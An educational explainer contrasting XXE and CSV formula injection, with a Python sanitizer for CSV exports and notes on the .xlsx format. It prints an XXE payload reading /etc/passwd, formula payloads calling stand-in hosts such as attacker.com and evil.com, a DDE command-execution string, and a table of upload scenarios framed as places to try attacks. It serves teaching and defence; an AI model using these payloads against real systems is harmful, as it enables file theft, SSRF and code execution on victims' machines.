XXE and CSV Injection Difference
1. XXE (XML External Entity) Injection
Target: Applications that parse XML input
Cause: Improper XML parser configuration that allows external entity declarations
Exploitation: Attackers inject malicious XML with external entities that can:
- Read local files (`file://`)
- Perform SSRF (Server-Side Request Forgery)
- Potentially execute remote code (in edge cases)
Example Payload:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
```
Impact:
- Data exfiltration (e.g., `/etc/passwd`)
- Internal network scans (via SSRF)
- Denial of Service
2. CSV Injection (Formula Injection)
Target: Applications that export data to spreadsheets (like Excel)
Cause: Unescaped user input exported into CSV files
Exploitation: Attackers inject spreadsheet formulas like `=cmd|' /C calc'!A0` that execute when the exported file is opened in Excel or a similar spreadsheet application (DDE-style payloads still depend on the user accepting the application's security prompts)
Example Payload:

```text
=HYPERLINK("http://attacker.com","Click me")
```

or

```text
=cmd|' /C calc'!A0
```
Impact:
- Code execution (on the client machine)
- Phishing via links
- Exfiltration of data (e.g., using `WEBSERVICE()` or `HYPERLINK()`)
Summary Table
Feature | XXE Injection | CSV Injection |
---|---|---|
Affects | XML parsers | Spreadsheet software (Excel, etc.) |
Input type | XML | CSV / spreadsheet rows |
Goal | Server-side file access, SSRF, etc. | Client-side code execution or phishing |
Risk Level | Server compromise | Client compromise |
Mitigation | Disable external entities in XML parsers | Sanitize values starting with `=`, `+`, `-`, `@` |
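As an added example (not part of the original notes), here is a Python implementation of the CSV-side mitigation from the table above: it neutralizes cells that begin with a formula-trigger character before export, and it flags such cells in an uploaded CSV so they can be logged or rejected. The function names and the sample rows are mine; tab and carriage return are included as triggers following OWASP's CSV injection guidance.

```python
import csv
import io

# Leading characters that Excel/LibreOffice may treat as the start of a formula.
# The page lists = + - @; tab and carriage return are added per OWASP guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Force a cell to be read as text: a leading single quote makes spreadsheet
    software treat the value as a literal string, not a formula. Caveat: the '-'
    rule also catches negative numbers, so write numeric columns as numbers."""
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(header, rows):
    """Serialize rows to CSV with every user-controlled cell neutralized.
    QUOTE_ALL wraps each field in double quotes (doubling embedded quotes), so a
    value containing a comma or newline cannot break the row structure."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    writer.writerow(header)
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Return (row, col, value) for cells of an uploaded CSV that look like
    formulas, for logging or rejecting uploads that will be opened in Excel."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                findings.append((r, c, cell))
    return findings


if __name__ == "__main__":
    # Constructed sample rows, modelled on the page's Name,Email,Comment export.
    header = ("Name", "Email", "Comment")
    rows = [("John", "john@example.com", "=HYPERLINK('http://evil.com')"),
            ("Jane", "jane@example.com", "-10% off would be nice")]
    print(find_formula_cells("Name,Comment\r\nJohn,=HYPERLINK('http://evil.com')\r\n"))
    print(export_csv(header, rows))
```

Run `find_formula_cells` over the output of `export_csv` and it returns an empty list, which is a cheap regression check for the export path.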
Now you may ask: are Excel sheets a combination of, or written in, XML?
Nice catch: yes, modern Excel files (.xlsx) are actually ZIP archives that contain XML files inside.
Let me break that down:
Modern Excel File Format (.xlsx)
Introduced with Office 2007, the .xlsx format is based on Office Open XML, a Microsoft-developed standard. If you rename an .xlsx file to .zip and unzip it, you'll see a structure like:
```text
[Content_Types].xml
_rels/
xl/
  workbook.xml
  worksheets/
    sheet1.xml
  styles.xml
  sharedStrings.xml
docProps/
```
Each worksheet (like `sheet1.xml`) is stored as an XML file describing cells, styles, data types, etc.
So Does That Mean CSV = XML?
Nope! Even though .xlsx uses XML internally, CSV files are completely different:
File Type | Format | Structure |
---|---|---|
.xlsx | XML in ZIP | Complex, styled, structured |
.csv | Plain Text | Simple rows and columns separated by commas |
CSV files are just text-based and don't use XML at all. They're usually generated/exported as raw data, like:
```csv
Name,Email,Comment
John,john@example.com,"=HYPERLINK('http://evil.com')"
```
So, CSV injection ≠ XML: it does not involve XML at all, but Excel (the application) can open both .csv and .xlsx files.
Bottom Line
- CSV injection abuses Excel formulas in .csv files.
- XXE abuses vulnerabilities in XML parsers.
- .xlsx files are XML-based, but CSVs are not.
CSV File Upload Scenarios:

Scenario | Vulnerability? | Payload Example |
---|---|---|
User uploads a .csv resume file | Yes, if viewed in Excel | `=WEBSERVICE("http://yourserver")` |
You input a comment, and the site exports comments to .csv | Yes | `=HYPERLINK("http://attacker.com")` |
CSV file gets parsed server-side | Usually safe (if no Excel viewing involved) | N/A |
XXE File Upload Scenarios:

Scenario | Vulnerability? | Notes / Payload Example |
---|---|---|
Site accepts .xml file upload | Yes | Try basic XXE to read `file:///etc/passwd` |
Site accepts .docx or .xlsx uploads | Sometimes | These are ZIP files with embedded XML (inject in `word/document.xml`, etc.) |
Site imports user config via XML | Yes | Classic XXE opportunity |
Site parses SVG files (they're XML too) | Yes | Inject an `<!ENTITY>` declaration inside the SVG; many parsers are vulnerable |
Site parses XML but uses a secure parser | No | If external entities are disabled (good config), XXE won't work |
Site uses JSON only | No | XXE only works in XML-based data |
Site returns an error after XML upload | Maybe | Could be trying to parse it; test further with blind XXE or SSRF payloads |
File upload leads to internal API processing XML | Yes | Upload the XML file; a backend service parses it (even if you don't see output) |